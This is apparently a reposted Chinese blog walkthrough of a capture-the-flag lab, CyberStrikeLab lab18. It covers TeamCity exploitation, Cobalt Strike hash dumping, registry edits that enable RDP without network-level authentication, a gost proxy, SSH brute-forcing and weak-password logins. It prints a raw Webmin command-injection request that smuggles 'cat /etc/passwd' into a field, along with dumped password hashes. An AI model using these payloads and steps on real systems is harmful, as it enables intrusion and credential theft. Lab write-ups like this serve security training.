2026-06-26 06:49:34 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 该文档记录了一次多阶段渗透测试过程，攻击者通过Joomla漏洞扫描、TeamCity服务漏洞利用获取初始权限，随后横向移动发现双网卡环境，利用SSH爆破、MySQL弱口令和堡垒机弱口令逐步深入内网，最终通过CS工具获取哈希值并控制多台主机。整个过程涉及漏洞利用、代理搭建、横向移动和权限维持等典型红队手法。 综合评分： 72 文章分类： 渗透测试,红队,内网渗透,WEB安全,实战经验

cover_image

CyberStrikeLab lab18

luther luther

luther-sec

2026年6月9日 17:29 四川

在小说阅读器读本章

去阅读

靶场较为简单，很多过程已经省略

flag1

端口扫描

joolma扫描到一个漏洞，可以读取joomla的信息，可以知道版本是3.4

在8111端口发现一个web服务teamcity，发现存在漏洞，可以直接使用终端，直接获取flag,

也可以读到其他敏感文件，比如数据库用户名和密码

上线cs，只要是windows，我上线第一步就是抓取hash，然后开启rdp

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d2b3ba29f1605019ed232bc5c23a4050:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

add&nbsp;"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"&nbsp;/v UserAuthentication /t REG_DWORD /d 0 /f

rdp连接，在数据库收集到两个密文

admin:$2y$10$mEho/Nt3qh1A0i3fLJX9SecAnwHGWlJyoFngSEN8e9ehtu2p.LLLucslab:$2y$10$MKykYPvtDJdj3gsynjwSLelHiwJA1aHGM3rPIr91SyqHaxnVdp5Cy

flag2

信息收集发现是双网卡，扫另一个网段

发现10.8.8.6和10.8.8.10，搭建socks代理服务，fscan扫出来一个漏洞

gost.exe -L socks5://:9001

幸运的是，爆破ssh的时候，直接得到了ssh密码

cyberstrike@2024

当然，这个漏洞也是可以利用的

POST /password_change.cgi HTTP/1.1Host:10.8.8.6:10000User-Agent:Mozilla/5.0(CentOS;Linux i686)AppleWebKit/537.36(KHTML, like Gecko)Chrome/118.0.0.0Safari/537.36Connection: closeContent-Length:73Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Content-Type: application/x-www-form-urlencodedReferer: https://10.8.8.6:10000Accept-Encoding: gzip
user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2

flag3

好奇的是没有找到flag，继续10.8.8.10，发现mysql弱口令

mdut一把梭

看下ip

直接上传gost搭建代理，直击最深处

上线cs,抓取hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e175348cb1254004830c3be4008e94f:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

flag4&5

扫描一下发现堡垒机，弱口令登进去，admin 123456

获取flag

DC这台主机也能获取

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：luther-sec luther luther《CyberStrikeLab lab18》